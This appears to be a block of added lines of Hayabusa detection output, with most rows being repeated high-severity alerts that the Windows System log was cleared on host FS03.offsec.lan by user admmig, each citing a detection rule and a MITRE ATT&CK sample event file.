+2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
